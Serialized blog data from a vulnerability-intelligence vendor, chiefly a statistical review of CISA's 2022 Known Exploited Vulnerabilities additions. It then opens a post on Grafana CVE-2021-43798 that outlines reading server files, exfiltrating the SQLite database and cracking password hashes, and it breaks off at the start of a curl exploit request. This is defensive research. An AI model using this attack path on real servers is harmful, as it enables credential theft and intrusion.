The data it offers is not only useful, but important to almost all of us.",[18,107079,107080],{},"The following VulnCheck 2022 Exploited Vulnerability Report takes a year long review of the CISA KEV Catalog.",[263,107082],{":list":107083,"ico":266,"title":107084},"[\"The KEV Catalog entered 2022 with 311 CVEs and nearly tripled in size by the end of the year, reaching a total of 868 entries.\",\"A majority of the new additions in 2022 weren’t for new vulnerabilities. Of the 557 CVE, only 17% used a CVE-2022 identifier. The oldest added vulnerability came from 2002.\",\"CISA added 93 CVE-2022 vulnerabilities to the Catalog in 2022. That means every week, most defenders could expect almost two newly published vulnerabilities.\",\"Among the 557 newly added CVEs, 22 named vulnerabilities were added, including EternalRomance, EternalBlue, EternalChampion, Shellshock, Heartbleed, EskimoRoll, Shellshock, Dogwalk, SpoolFool, Dirty Pipe, ProxyNotShell, Ripple20 and more.\",\"Since the beginning of 2020, VulnCheck has tracked more than 400 named vulnerabilities. Yet, in 2022, only 4% of the CVE added to KEV had an associated name. The other 96% had no names, but were useful enough to be exploited in the wild.\",\"In 2022, KEVs were weaponized against operating systems, IoT, desktop applications and web browsers the most.\",\"VulnCheck linked 122 (22%) of the newly added vulnerabilities to use in ransomware attacks.\",\"Of the 557 new entries, 200 (35.9%) are initial access vulnerabilities, which VulnCheck recommends prioritizing over client side, local, and credentialed attacks.\",\"Roughly 11% of the KEV entries for CVE published in 2022 were added before or on the same day a public exploit or exploitation details were made public. 
However, almost half (48%) of vulnerabilities took more than one week to be added to the Catalog.\"]","The VulnCheck 2022 Exploited Vulnerability Report - A Year Long",[61,107086,107088],{"id":107087},"more-than-doubled-in-size","More Than Doubled in Size",[18,107090,107091,107092,107095],{},"In 2022, CISA added ",[1131,107093,107094],{},"a lot"," of vulnerabilities to the KEV Catalog. The Catalog entered 2022 with 311 CVEs and more than doubled in size by the end of the year. CISA added 557 new CVEs to reach a total of 868 entries by the end of 2022.",[18,107097,107098],{},"The addition of 557 CVEs over a single year breaks down to almost 11 new exploited-in-the-wild vulnerabilities added to the Catalog every week. However, the vulnerabilities weren’t actually added in such a linear fashion and a huge chunk of the vulnerabilities were added in March. By the second half of the year, new additions had tapered off.",[1925,107100,107101],{},[18,107102,107103],{},"CISA KEV Entries Published in 2022",[11128,107105],{":labels":107106,":values":107107},"[\"January\",\"February\",\"March\",\"April\",\"May\",\"June\",\"July\",\"August\",\"September\",\"October\",\"November\",\"December\"]","[40,32,226,45,83,49,3,23,25,12,10,9]",[18,107109,107110],{},"A majority of the new additions in 2022 weren’t for new vulnerabilities. Of the 557 CVEs, only 93 (17%) used a CVE-2022 identifier. The following graph shows the 557 CVEs mapped to their CVE-ID year.",[1925,107112,107113],{},[18,107114,107115],{},"2022 CISA KEV Additions By CVE Year",[11128,107117],{":labels":107118,":values":107119},"[2002,2003,2004,2005,2006,2007,2008,2009,2010,2011,2012,2013,2014,2015,2016,2017,2018,2019,2020,2021,2022]","[1,0,1,1,2,2,3,11,16,8,18,33,25,39,40,61,62,58,31,52,93]",[18,107121,107122,107123,107128,107129,107132],{},"As the graph shows, vulnerabilities throughout the last two decades were added to the KEV list in 2022. 
The oldest, ",[47,107124,107127],{"href":107125,"rel":107126},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2002-0367",[51],"CVE-2002-0367",", affected Windows NT and Windows 2000 systems. Certainly, there are many active Windows NT\u002F2000 systems across the globe. Still, it’s important to remember that the KEV Catalog is not a list of “currently exploited” vulnerabilities but a list of exploit",[295,107130,107131],{},"ed"," vulnerabilities. The Catalog is fairly young, so it appears 2022 was used to catch up with the historical backlog of exploited vulnerabilities. That inevitably resulted in many old vulnerabilities being added to the Catalog.",[18,107134,107135,107136,107141],{},"Some old vulnerabilities have a lot of staying power, as we’ll later discuss, so they are important to know. But we’re especially interested in the recently published vulnerabilities added to KEV because those are more likely to be active threats. To get a better look at the vulnerabilities published in 2022, we filtered the 557 new KEV entries by their NVD publication date (As an interesting aside, by doing this, we found a KEV entry that hasn’t been published to NVD: ",[47,107137,107140],{"href":107138,"rel":107139},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2019-8720",[51],"CVE-2019-8720",". 
The following graph shows the NVD publication dates of the newer vulnerabilities.",[1925,107143,107144],{},[18,107145,107146],{},"NVD Publication Dates of the CVE-2022 Vulnerabilities Added to CISA KEV in 2022",[11128,107148],{":labels":107149,":values":107150},"[\"2022-01\",\"2022-02\",\"2022-03\",\"2022-04\",\"2022-05\",\"2022-06\",\"2022-07\",\"2022-08\",\"2022-09\",\"2022-10\",\"2022-11\",\"2022-12\"]","[4,14,11,12,9,3,7,6,8,4,8,6]",[18,107152,107153,107154,107159],{},"CISA added 92 CVE-2022 vulnerabilities that were published in 2022 (this number should be 93, but ",[47,107155,107158],{"href":107156,"rel":107157},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-42475",[51],"CVE-2022-42475",", Fortinet FortiOS Heap-Based Buffer Overflow, was added to KEV on December 13, 2022, and wasn’t added to NVD until January 2, 2023).",[18,107161,107162,107163,107167,107168,107173],{},"The graph shows that more vulnerabilities from the first half of the year were added to the Catalog compared to the second half. While true now, this might not be the case in a few months. New vulnerabilities aren’t always exploited in the wild immediately, as we’ll see later, and sometimes there’s a delay in adding them to the KEV Catalog. A great example of that is ",[47,107164,106263],{"href":107165,"rel":107166},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-35914",[51],", an ",[47,107169,107172],{"href":107170,"rel":107171},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fglpi-exploitation",[51],"actively exploited vulnerability"," affecting GLPI that was published in September but still hasn’t found its way into the KEV Catalog.",[18,107175,107176],{},"For most defenders, the new vulnerabilities graph should be fairly daunting, even without the missing vulnerabilities added in. Every week in 2022, defenders could expect almost two newly published vulnerabilities would find their way onto the KEV Catalog. 
Without good inventory management and decent vulnerability prioritization, defenders are essentially running a constant fire drill because attackers are eagerly adding new vulnerabilities to their arsenals.",[61,107178,107180],{"id":107179},"named-vulnerabilities","Named Vulnerabilities",[18,107182,107183,107184,107187,107188,107193,107194,107199,107200,107205],{},"Among the 557 newly added CVEs, there were 22 named vulnerabilities added to the KEV Catalog. Of the old vulnerabilities, it’s interesting to see what wasn’t included in the original KEV Catalog when it debuted in 2021. EternalRomance and EternalBlue, a vulnerability that has been widely exploited since the ",[47,107185,106938],{"href":106936,"rel":107186},[51]," leak in 2017, were added to the Catalog in February 2022. Their sibling, EternalChampion, was added alongside ",[47,107189,107192],{"href":107190,"rel":107191},"https:\u002F\u002Ftwitter.com\u002Fgentilkiwi\u002Fstatus\u002F852928424960241664",[51],"EskimoRoll"," in March. 
A couple of ",[47,107195,107198],{"href":107196,"rel":107197},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FShellshock_(software_bug)",[51],"Shellshock"," vulnerabilities were added in January, and ",[47,107201,107204],{"href":107202,"rel":107203},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FHeartbleed",[51],"Heartbleed"," was added in May.",[18,107207,107208,107209,1246,107213,1246,107218,1255,107223,107228],{},"Of course, it wasn’t only old named vulnerabilities that were added to the list: ",[47,107210,103420],{"href":107211,"rel":107212},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002Fcve-2022-30190",[51],[47,107214,107217],{"href":107215,"rel":107216},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002Fcve-2022-34713",[51],"Dogwalk",[47,107219,107222],{"href":107220,"rel":107221},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002Fcve-2022-0847",[51],"Dirty Pipe",[47,107224,107227],{"href":107225,"rel":107226},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002Fcve-2022-21990",[51],"SpoolFool"," are some of the CVE-2022 vulnerabilities that were added.",[18,107230,107231],{},"For whatever reason, it felt weird that Log4Shell wasn’t among the 22 named vulnerabilities. Somehow it feels like Log4Shell happened yesterday, but CVE-2021-44228 was added to the Catalog in December 2021. Perhaps Log4Shell feels so fresh because of the long tail of exploitation, reporting, and remediation. The copy-cat names that popped up in 2022 didn’t help either: Spring4Shell (in the Catalog) and Text4Shell (not in the Catalog).",[18,107233,107234],{},"Naming vulnerabilities is fun. There is no doubt about it. But the reality is that a cool logo or a silly name doesn’t impact a vulnerability's usefulness. Since the beginning of 2020, VulnCheck has tracked more than 400 named vulnerabilities. Yet, in 2022, a year that CISA used to add a backlog of historical CVE, only 4% of the CVE added to KEV had an associated name. 
The other 96% had no names but were useful enough to be exploited in the wild. Think about that the next time you start to panic over a fancy new logo’d vulnerability.",[61,107236,107238],{"id":107237},"whats-being-exploited","What’s being exploited?",[18,107240,107241,107242,107247,107248,107253,107254,107256],{},"One of the surprises among the named vulnerabilities was ",[47,107243,107246],{"href":107244,"rel":107245},"https:\u002F\u002Fwww.jsof-tech.com\u002Fdisclosures\u002Fripple20\u002F",[51],"Ripple20",". Ripple20 is the name of 19 vulnerabilities affecting a TCP\u002FIP stack used by a variety of IoT, IoMT (Internet of Medical Things), and ICS\u002FOT systems. The specific Ripple20 vulnerability in KEV is ",[47,107249,107252],{"href":107250,"rel":107251},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2020-11899",[51],"CVE-2020-11899",". We may never know if CVE-2020-11899 was used against an ICS\u002FOT network or against a medical network, but by mapping each KEV Catalog vulnerability to affected systems (or components), we can get a general idea of ",[1131,107255,12889],{}," attackers are exploiting. The graph below maps the KEV Catalog entries from 2022:",[1925,107258,107259],{},[18,107260,107261],{},"CISA KEV 2022 Additions Categorized",[11128,107263],{":labels":107264,":values":107265},"[\"Desktop Application\",\"Firmware\",\"ICS\u002FOT\",\"IoMT\",\"IoT\",\"Mobile\",\"Operating System\",\"Server Software\",\"Web Browser\",\"Web Framework\",\"Unassigned\"]","[67,48,46,33,109,32,212,24,58,12,149]",[18,107267,107268,107269,107273],{},"If you add all the columns, you’ll find the number exceeds 557. That’s because some vulnerabilities fit into more than one category. The Ripple20 vulnerability was a great example of that. Another good example is ",[47,107270,107222],{"href":107271,"rel":107272},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-0847",[51],". 
Dirty Pipe is categorized as “Operating System”, “IoMT”, “Firmware”, and “ICS\u002FOT”. This is entirely based on who has issued advisories for the vulnerability. For DirtyPipe that’s:",[22,107275,107276,107279,107282,107285],{},[25,107277,107278],{},"Operating System: Ubuntu, Debian, RedHat, SUSE",[25,107280,107281],{},"IoMT: GE-Healthcare",[25,107283,107284],{},"ICS\u002FOT: Siemens, Wago, ICS-CERT",[25,107286,107287],{},"Firmware: SonicWall, NetApp",[18,107289,107290],{},"Having completed this exact mapping for all 557 vulnerabilities, we have a few observations. The first is that, over the years, operating system vulnerabilities have been incredibly important for attackers. It’s the top category because it’s the most reliable path for exploitation. Using a Windows vulnerability in a campaign will be much more flexible than, for example, a specific PDF reader. A good operating system patching plan is essential for defenders. This isn’t surprising to anyone (Patch Tuesday is\u002Fwas important for a reason), but it is worth calling out.",[18,107292,107293],{},"Another observation is if you stack “Desktop Application” and “Web Browser”, then you have a fairly large category of vulnerabilities that likely require the user to do something (open a word doc, click a link). These are the favorite targets of a variety of advanced threat actors. Being able to inventory these types of applications and apply patches is a huge headache. But ensuring end users’ browsers and favorite editors are up to date need to be high in the prioritization list.",[18,107295,107296,107297,107302,107303,107308,107309,107312,107313,107316,107317,107320],{},"Finally, after looking through the data, we think “IoT” and “Server Software” are the most important categories. 
These categories contain items like ",[47,107298,107301],{"href":107299,"rel":107300},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2021-20038",[51],"CVE-2021-20038"," (SonicWall SMA-100 stack-based buffer overflow) and ",[47,107304,107307],{"href":107305,"rel":107306},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002Fcve-2022-26136",[51],"CVE-2022-26136"," (Confluence OGNL RCE). These vulnerabilities are largely used by attackers with ",[295,107310,107311],{},"no"," access to the victim network. They use these vulnerabilities to establish initial access ",[1131,107314,107315],{},"without any type of user interaction."," The attacks are incredibly dangerous ",[1131,107318,107319],{},"because"," they don’t rely on access or user mistakes.",[18,107322,107323],{},"We have an idea of what is being exploited by the new CISA KEV Catalog entries, but what about how?",[1920,107325,107327],{"id":107326},"how-is-exploitation-happening","How is exploitation happening?",[18,107329,107330,107331,107336],{},"We previously published a blog, ",[47,107332,107335],{"href":107333,"rel":107334},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fkev-prioritization",[51],"Prioritizing CISA Known Exploited Vulnerabilities",", on the importance of understanding how vulnerabilities are being exploited in order to properly prioritize them for remediation. 
In that blog, we discussed how VulnCheck breaks down vulnerabilities into seven categories:",[22,107338,107339,107342,107345,107348,107351,107354,107357],{},[25,107340,107341],{},"Initial Access (unauthenticated and remote compromise)",[25,107343,107344],{},"Credentialed Initial Access (authenticated and remote compromise)",[25,107346,107347],{},"Information Leak (unauthenticated and remote data leak)",[25,107349,107350],{},"Denial of Service",[25,107352,107353],{},"Client-Side (user interaction vulnerabilities)",[25,107355,107356],{},"Local",[25,107358,107359],{},"Other (anything that doesn’t fit above)",[18,107361,107362],{},"The CVE added to KEV in 2022 are categorized in the following graph:",[1925,107364,107365],{},[18,107366,107367],{},"CISA KEV 2022 Additions By Vulnerability Type",[78559,107369],{":labels":107370,":values":107371},"[\"Client-Side\",\"Denial of Service\",\"Information Leak\",\"Initial Access\",\"Local\",\"No NVD Vector\",\"Other\",\"Credentialed Initial Access\"]","[185,28,20,200,75,1,7,41]",[18,107373,107374,107375,107377],{},"In the Prioritization blog, which we encourage you to read, we suggest prioritizing Initial Access vulnerabilities. While dangerous, client side, local, and credentialed attacks are simply less of a priority compared to vulnerabilities that can be exploited at will with no user interaction. Prioritizing initial access vulnerabilities makes sense ",[295,107376,297],{}," it immediately drops the defender's high-priority workload. Of the 557 new CISA KEV entries, 200 (35.9%) are initial access vulnerabilities.",[18,107379,107380,107381,107383],{},"The other important aspect of prioritization is ",[1131,107382,106141],{}," is exploiting a vulnerability in the wild. That can further narrow down the CVE prioritization list. 
So, let’s look at who is exploiting these 557 vulnerabilities.",[1920,107385,107387],{"id":107386},"kev-entries-exploited-in-the-wild","KEV Entries Exploited in the Wild",[18,107389,107390],{},"The KEV Catalog lets everyone know a vulnerability has been exploited in the wild, but that’s it. Not by who. Not where. Not why. Those are all important factors. For example, was the vulnerability exploited by a threat actor that only targets organizations in Southeast Asia, or was it globally exploited to drop ransomware? Those are two very different things to an overworked defender.",[18,107392,107393],{},"We mapped the 557 vulnerabilities to associated threat actors, ransomware, and\u002For botnets. The following graph shows how many of the vulnerabilities are associated with one of those groups (note that this isn’t intended to add up to 557).",[1925,107395,107396],{},[18,107397,107398],{},"CISA KEV 2022 Additions Categorized by Attacker Type",[11128,107400],{":labels":107401,":values":107402},"[\"Threat Actor\",\"Ransomware\",\"Botnet\"]","[241,122,69]",[18,107404,107405],{},"This graph shows, for example, that VulnCheck can link 122 (22%) of the 2022 KEV entries to ransomware. That’s incredibly useful to know for prioritization, but because that type of information isn’t in the KEV Catalog, defenders have to seek that out themselves.",[18,107407,107408],{},"At VulnCheck, we aggregate and curate as much threat intelligence as possible. That’s what allows us to link CVE to particular ransomware crews, botnets, or threat actors. It also allows us to see how much some vulnerabilities are reused. 
Consider these three tables that show the most reused vulnerabilities from the 2022 KEV entries for ransomware, threat actors, and botnets.",[1925,107410,107411],{},[18,107412,107413],{},"Top 5 CVE Used by Ransomware",[307,107415,107416,107425],{},[310,107417,107418],{},[313,107419,107420,107422],{},[316,107421,319],{"align":24087},[316,107423,107424],{"align":318},"Ransomware Variants",[336,107426,107427,107436,107446,107455,107464],{},[313,107428,107429,107432],{},[341,107430,107431],{"align":24087},"CVE-2013-0074",[341,107433,107434],{"align":318},[295,107435,48192],{},[313,107437,107438,107441],{},[341,107439,107440],{"align":24087},"CVE-2012-0507",[341,107442,107443],{"align":318},[295,107444,107445],{},"42",[313,107447,107448,107451],{},[341,107449,107450],{"align":24087},"CVE-2012-1723",[341,107452,107453],{"align":318},[295,107454,102453],{},[313,107456,107457,107460],{},[341,107458,107459],{"align":24087},"CVE-2010-0188",[341,107461,107462],{"align":318},[295,107463,37766],{},[313,107465,107466,107469],{},[341,107467,107468],{"align":24087},"CVE-2017-0145",[341,107470,107471],{"align":318},[295,107472,24698],{},[1823,107474],{},[1925,107476,107477],{},[18,107478,107479],{},"Top 5 CVE Used By Named Threat Actors",[307,107481,107482,107491],{},[310,107483,107484],{},[313,107485,107486,107488],{},[316,107487,319],{"align":24087},[316,107489,107490],{"align":318},"Named Threat 
Actors",[336,107492,107493,107502,107511,107520,107529],{},[313,107494,107495,107498],{},[341,107496,107497],{"align":24087},"CVE-2015-5119",[341,107499,107500],{"align":318},[295,107501,37766],{},[313,107503,107504,107507],{},[341,107505,107506],{"align":24087},"CVE-2010-3333",[341,107508,107509],{"align":318},[295,107510,37766],{},[313,107512,107513,107516],{},[341,107514,107515],{"align":24087},"CVE-2014-1761",[341,107517,107518],{"align":318},[295,107519,24698],{},[313,107521,107522,107525],{},[341,107523,107524],{"align":24087},"CVE-2022-22965",[341,107526,107527],{"align":318},[295,107528,723],{},[313,107530,107531,107534],{},[341,107532,107533],{"align":24087},"CVE-2022-30190",[341,107535,107536],{"align":318},[295,107537,37681],{},[1823,107539],{},[1925,107541,107542],{},[18,107543,107544],{},"Top 5 CVE Used By Named Botnets",[307,107546,107547,107556],{},[310,107548,107549],{},[313,107550,107551,107553],{},[316,107552,319],{"align":24087},[316,107554,107555],{"align":318},"Named Botnets",[336,107557,107558,107567,107576,107585,107594],{},[313,107559,107560,107563],{},[341,107561,107562],{"align":24087},"CVE-2018-10561",[341,107564,107565],{"align":318},[295,107566,723],{},[313,107568,107569,107572],{},[341,107570,107571],{"align":24087},"CVE-2018-10562",[341,107573,107574],{"align":318},[295,107575,423],{},[313,107577,107578,107581],{},[341,107579,107580],{"align":24087},"CVE-2016-6277",[341,107582,107583],{"align":318},[295,107584,356],{},[313,107586,107587,107590],{},[341,107588,107589],{"align":24087},"CVE-2015-2051",[341,107591,107592],{"align":318},[295,107593,401],{},[313,107595,107596,107599],{},[341,107597,107598],{"align":24087},"CVE-2017-10271",[341,107600,107601],{"align":318},[295,107602,380],{},[1823,107604],{},[1920,107606,107608],{"id":107607},"time-to-kev","Time to KEV",[18,107610,107611],{},"In this final section, we look at how long it takes for a vulnerability to be added to the KEV Catalog. 
KEV is not supposed to be an early warning system, and treating it that way is unfair. But it is treated that way, and frankly, it’s interesting to see how long it takes for exploited vulnerabilities to arrive there.",[18,107613,107614,107615,107617],{},"For this discussion, “Time to KEV” is measured from the first public exploit ",[1131,107616,4536],{}," the first public reporting of exploitation in the wild. Measuring from the first public exploit is a little unfair. But there are really two good reasons why we’ve done that:",[1789,107619,107620,107623],{},[25,107621,107622],{},"Open source threat intelligence (including exploitation in the wild details) often significantly lags actual exploitation. Many of the organizations that share this information put it out in detailed reports well after the incident has completed.",[25,107624,107625],{},"A (good) public exploit is a solid indicator of imminent exploitation. We’ve seen this time after time. This only becomes unfair, we think, when the public exploit is bad, but that’s difficult to measure at scale.",[18,107627,107628],{},"Measuring “Time to KEV” for all 557 vulnerabilities is sort of useless. As discussed, the majority of the vulnerabilities are old, and pre-date the KEV Catalog. So we, once again, filtered the 557 CVE down to those CVE-2022 vulnerabilities published in 2022. We performed the calculation and generated the following “Time to KEV” graph.",[1925,107630,107631],{},[18,107632,107633],{},"CISA KEV CVE-2022 Vulnerabilities Added in 2022 \"Time to KEV\"",[11128,107635],{":labels":107636,":values":107637},"[\"Before other sources\",\"Same day\",\"Within 1 week\",\"Within 1 month\",\"Within 3 months\",\"Within 6 months\",\"Within 1 year\",\"More than 1 year\"]","[1,9,38,17,12,9,5,2]",[18,107639,107640,107641,1246,107646,107651],{},"Admittedly, the graph excluded a few vulnerabilities with no public exploits and no public information about exploitation in the wild. 
For example, a couple of Cisco RV series vulnerabilities (",[47,107642,107645],{"href":107643,"rel":107644},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-20701",[51],"CVE-2022-20701",[47,107647,107650],{"href":107648,"rel":107649},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-20703",[51],"CVE-2022-20703",") are included in the KEV list and have no public proof of concept or reporting of exploitation in the wild (although we do have some interesting details on these vulnerabilities we’ll share in a few weeks).",[18,107653,107654,107655,107657,107658,107663],{},"For the remainder, the graph shows that 11% of the KEV entries for CVE published in 2022 were added before or on the same day a public exploit or exploitation details were made public. The one vulnerability in our dataset that was added ",[1131,107656,36132],{}," any other data source was ",[47,107659,107662],{"href":107660,"rel":107661},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-20700",[51],"CVE-2022-20700",", which again is a Cisco RV series vulnerability. Put a pin in that for a few weeks.",[18,107665,107666,107667,107672],{},"The “same day” additions include vulnerabilities like ",[47,107668,107671],{"href":107669,"rel":107670},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-22047",[51],"CVE-2022-22047",". Microsoft’s advisory indicating exploitation in the wild was released on July 12, 2022, and the vulnerability was added to the KEV Catalog the same day. A perfect response time.",[18,107674,107675,107676,107681],{},"41% of vulnerabilities were added within a week of an exploit or exploitation details being made public. A good example of this is Fortiguard’s ",[47,107677,107680],{"href":107678,"rel":107679},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-40684",[51],"CVE-2022-40684",". 
On October 10, Fortiguard released an advisory indicating the vulnerability was exploited in the wild, and CISA added the vulnerability to the KEV Catalog on October 11.",[18,107683,107684,107685,107690,107691,107696,107697,107701,107702,107707],{},"The remaining 48% of vulnerabilities took more than one week to be added to the KEV Catalog. An example from that group is ",[47,107686,107689],{"href":107687,"rel":107688},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-26500",[51],"CVE-2022-26500",". The vulnerability was added to NVD in March 2022. A ",[47,107692,107695],{"href":107693,"rel":107694},"https:\u002F\u002Fy4er.com\u002Fposts\u002Fcve-2022-26500-veeam-backup-replication-rce\u002F",[51],"technical breakdown and proof of concept"," was shared the same month. A report of ",[47,107698,107700],{"href":106416,"rel":107699},[51],"exploits for sale"," was published in October 2022, and ransomware was ",[47,107703,107706],{"href":107704,"rel":107705},"https:\u002F\u002Fwww.kroll.com\u002Fen\u002Finsights\u002Fpublications\u002Fcyber\u002Favoslocker-ransomware-update",[51],"linked"," to the vulnerability in early December. The vulnerability was added to the KEV catalog on December 13, 2022, nine months after the first public PoC and about two months after initial reports of likely exploitation in the wild.",[18,107709,107710],{},"Of course, such delays aren’t always the fault of CISA (and show bias to how we measured “Time to KEV”). Consider Dogwalk (CVE-2022-34713). The first proof of concept for this vulnerability was published in 2020. Public reporting indicated exploitation in the wild started in Spring 2022. But Microsoft didn’t fix the vulnerability or publish an advisory until August 2022. CISA quickly added the vulnerability to KEV after the Microsoft advisory went public. 
But that was months after exploitation and years after the first proof of concept.",[18,107712,107713,107714,107717],{},"The KEV Catalog isn’t an early warning system, but warning everyone about exploitation in the wild within a week of the first public exploit or exploitation details at a 52% rate is very respectable. Of course, that doesn’t tell the full story. There are a whole bunch of vulnerabilities published in 2022 that are known to have been exploited and ",[1131,107715,107716],{},"aren’t"," on the CISA KEV list. Next week, we’ll look at those vulnerabilities.",[61,107719,1903],{"id":1902},[18,107721,107722],{},"In this blog we examined the additions to the CISA KEV Catalog in 2022, and we were able to make a series of useful observations:",[22,107724,107725,107728,107731,107734],{},[25,107726,107727],{},"In 2022, defenders saw nearly 2 newly published exploited vulnerabilities in the wild per week.",[25,107729,107730],{},"The KEV Catalog contains a large amount of vulnerabilities that affect operating systems.",[25,107732,107733],{},"Nearly all KEV Catalog entries can be linked to specific threat actors, botnets, or ransomware crews.",[25,107735,107736],{},"For items included in the KEV Catalog, CISA does a respectable job of adding them to the KEV Catalog in a timely manner.",[18,107738,107739],{},"Tune in next week where we’ll discuss the 2022 vulnerabilities exploited in the wild that aren’t in the KEV Catalog.",[18,107741,95204,107742,95208],{},[47,107743,78319],{"href":78319,"rel":107744},[51],{"title":219,"searchDepth":220,"depth":220,"links":107746},[107747,107748,107749,107750],{"id":107087,"depth":220,"text":107088},{"id":107179,"depth":220,"text":107180},{"id":107237,"depth":220,"text":107238},{"id":1902,"depth":220,"text":1903},"A review of the vulnerabilities added to the CISA KEV Catalog in 2022. 
VulnCheck examines which vulnerabilities were added in 2022, who exploited them, and how long it took to add them to the Catalog.",{"slug":107753,"sitemap":107754},"2022-cisa-kev-review",{"videos":107755,"images":107756},[],[],"\u002Fblog\u002F2022-cisa-kev-review",{"title":107055,"description":107751},"blog\u002F2022-cisa-kev-review",[1279],"p7ONjclWBQIj1JDItYUFGokay2DHLb2TmNCPlFNWKQ8",{"id":107763,"title":107764,"articles":107765,"authors":107774,"body":107776,"date":109212,"description":109213,"extension":234,"image":7,"link":7,"meta":109214,"navigation":237,"path":109216,"seo":109217,"series":7,"stem":109218,"subtype":7,"tags":109219,"__hash__":109220},"blog\u002Fblog\u002Fgrafana-cve-2021-43798.md","Assessing Potential Exploitation of Grafana's CVE-2021-43798 for Initial Access Access - Blog - VulnCheck",[107766,107770],{"title":107767,"source":3494,"link":107768,"date":107769},"Risky Biz News: Russia preparing new Vepr surveillance system","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-russia-preparing-new?utm_source=substack&utm_medium=email","2023-02-22",{"title":107771,"source":3481,"link":107772,"date":107773},"Critical Vulnerabilities You Should Know About","https:\u002F\u002Fwww.theregister.com\u002F2023\u002F02\u002F27\u002Fin_brief_security\u002F","2023-02-27",[107775],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":107777,"toc":109204},[107778,107780,107799,107803,107807,107810,107976,107991,108019,108027,108036,108041,108045,108063,108069,108076,108080,108096,108105,108495,108512,108517,108530,108541,108553,108557,108566,108572,108580,108683,108692,109010,109016,109022,109030,109082,109090,109094,109102,109105,109110,109113,109119,109131,109137,109153,109159,109162,109168,109181,109184,109186,109189,109192,109201],[61,107779,68327],{"id":68326},[18,107781,107782,107783,107787,107788,107793,107794,107798],{},"Grafana is a data visualization web application used by thousands of companies, 
including SalesForce, JPMorgan Chase, Cisco, and ",[47,107784,81313],{"href":107785,"rel":107786},"https:\u002F\u002Fgrafana.com\u002Fsuccess\u002F?technology=grafana",[51],". That’s likely why there was a lot of interest when ",[47,107789,107792],{"href":107790,"rel":107791},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2021-43798",[51],"CVE-2021-43798"," was ",[47,107795,90509],{"href":107796,"rel":107797},"https:\u002F\u002Fweb.archive.org\u002Fweb\u002F20211203190716\u002Fhttps:\u002F\u002Ftwitter.com\u002Fj0v0x0\u002Fstatus\u002F1466845212626542607",[51]," to Twitter as a zero-day on December 3, 2021.",[263,107800],{":list":107801,"ico":266,"title":107802},"[\"CVE-2021-43798 was a zero-day for only a short time. Grafana released an official patch on December 7, 2021, just before the Log4Shell hysteria re-prioritized security teams’ remediation efforts.\",\"Over a year later, 7,500 or 8% of Grafana instances indexed by Shodan remain vulnerable.\",\"We looked at a file disclosure vulnerability affecting Grafana and examined how this issue might be used to gain additional access to the affected system.\",\"Exfiltrating the Grafana SQLite database allows attackers to extract password hashes, brute-force them, and, potentially, establish administrative access on the system.\",\"We recommend patching this vulnerability as soon as possible. 
If your Grafana server was ever affected by this vulnerability, and exposed to the internet, we also recommend rotating all passwords (data source passwords included).\"]","Assessing Potential Exploitation of Grafana's CVE-2021-43798 for Initial Access",[61,107804,107806],{"id":107805},"details","Details",[18,107808,107809],{},"CVE-2021-43798 allowed a remote and unauthenticated attacker to read arbitrary files on a Grafana server using a simple HTTP request:",[1354,107811,107813],{"className":31740,"code":107812,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ curl --path-as-is 